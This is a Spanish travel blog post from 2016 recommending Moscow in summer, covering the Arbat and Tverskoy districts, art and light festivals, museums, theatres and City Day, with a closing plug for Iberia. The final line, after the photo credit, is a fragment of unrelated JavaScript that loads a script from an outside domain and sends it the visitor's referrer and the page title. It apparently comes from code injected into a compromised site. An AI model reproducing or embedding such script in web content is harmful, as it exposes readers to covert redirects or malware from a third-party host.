Moscú bajo el sol de las tendencias

22/07/2016

Arbat, en Moscú

Ahora que no hace frío, vayamos a Moscú. Aprovechemos, visitémosla en verano y ella nos lo agradecerá. ¿smoomo? Con mucha cultura, gastronomía, historia, arte y atmósfera cosmopolita (que la tiene). Fuera bufandas y guantes, solo cielos azules y plazas rojas.

El barrio de moda en Moscú

Arbat… Tverskoy… Los buenos planes creativos se cuecen en los barrios tendenciosos.

Arbat. Al oeste del centro de Moscú y justo en el límite del primer círculo de la ciudad se encuentra el distrito de Arbat. Para llegar hasta él haremos algo tan práctico como montarnos en el metro (en sí, una experiencia imprescindible en cualquier viaje a Moscú) y apearnos en la estación Arbatskaya.

Al salir nos dará la bienvenida ul Arbat, la reina entre las calles peatonales de Moscú, donde pintores, poetas, malabaristas, músicos y demás artistas callejeros hacen que aburrirse sea una quimera.

Tverskoy. Destaca como un área bulliciosa llena de comercios  y restaurantes que estará encantada de alojarnos, ya que lo hará muy bien. Sus calles aglutinan de todo un poco: desde comercios, pasando por bares, teatros o restaurantes. Callejas como Kamergersky o Stolesnikov se cuentan entre los lugares “top” de moda de Moscú para tomar un café o una cerveza y disfrutar de la algarabía, y todos quieren mesa en el afamado Café Pushkin (Tverskoy bulevar, 26a), de lo mejorcito en cocina rusa que existe Moscú (prestaremos buena atención al edificio, un atractivo en sí mismo).

Tverskoy -situado al norte del centro y dentro del primer anillo de la ciudad- es un destino para los amantes del teatro. Cuenta con 19 establecimientos, además de con la Sala de Conciertos Chaikovski, conservatorio de propiedad estatal que programa sesiones excelentes de música clásica. Por esto y por mucho más, el barrio más animado de la capital es todo dinamismo.

Moscú y el arte contemporáneo (también el digital y audiovisual)

Los muchos y variados planes creativos que la capital de Rusia ofrece nunca dejarán de sorprendernos. Sin ir más lejos, si estos días viajamos a la capital rusa nos toparemos con la Bienal Internacional de Arte Joven de Moscú, que este año celebra su lustro de vida y que aglutina las vanguardias de 93 artistas jóvenes de 36 países de todo el mundo. Aunque la cita arrancó el pasado 1 de julio, el proyecto estrella de la bienal, “Deep Inside” (Bien Adentro), podrá visitarse hasta el próximo 10 de agosto. La exposición es un estimulante intento de reflexión en torno a las nuevas tecnologías que nos rodean.

Por otro lado, aquellos que planeen un viaje cultural durante los próximos meses podrán hacer coincidir su visita con alguno de los eventos que cuelgan del «Circle of Light Moscow International Festival», un súper evento de proyecciones, “mapping”, luz y espectáculo ya en su sexta edición y que está programado para los días 23 a 27 de septiembre.

En paralelo al festival (el más grande de su categoría en el mundo) se desarrolla el Art vision Vjing 2016, iniciativa por la que creadores venidos de todas las esquinas del mundo proyectan sus obras audiovisuales sobre objetos urbanos y edificios emblemáticos de la ciudad, algunos tan populares como el Teatro Bolshoi o el Moscow Manege (plaza Manézhnaya). En todos los casos, las esperadas intervenciones van acompañadas de música y/o de una narración, y los artistas realizan un VJ set a un DJ set en directo. ¡Todo muy moderno!

Museos, cuadros, teatros, telones y moscovitas

Los museos de Moscú conforman una gran familia de 450 miembros. Algunos de los más cosmopolitas del mundo tienen fijada su residencia en la capital, entre ellos el Museo Pushkin de Bellas Artes, que con su vasta colección lo tiene todo para volver locos a los amantes de lo cultural.

Por otro lado, antes hablábamos de Moscú y su alta concentración en teatros, en concreto de los que pueblan las calles de uno de nuestros barrios de moda, el incansable Tverskoy. Y es que una de las maravillas de la capital son sus 43 teatros, cuyos escenarios aguardan a diario a miles de aficionados antes de levantar el telón. ¿Quién de nosotros no ha soñado alguna vez con una velada en el bellamente restaurado Bolshoi (1, Teatralnaya Ploshad) o en el imponente Lenkom (ul. Malaya Dmitrovka, 6)? ¡Seguro que a algunos se nos ha cortado la respiración solo de pensarlo! Así es Moscú, una ciudad que deshiela emociones y que de gélida, no tiene absolutamente nada.

Un último apunte de viaje. Tomemos nota de que Moscú estará especialmente guapa con motivo del “Día de la Ciudad”, que los moscovitas celebran el primer fin de semana de septiembre. Y como habremos elegido bien nuestras fechas, podremos disfrutar también de todo un espectáculo que solo pasa en verano: la singular ceremonia de la guardia montada del presidente, que tiene lugar en una localización tan irrepetible como la plaza de la Catedral del Kremlin de Moscú (cualquier sábado hasta octubre).

En conclusión, el mejor momento para volar a una ciudad tan creativa como Moscú (con Iberia, por supuesto) es ahora. ¿Quién se anima?

Museo Pushkin:  ulitsa Volkhonka, 12. Moscú.

Foto| Sergey Vladimirov

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;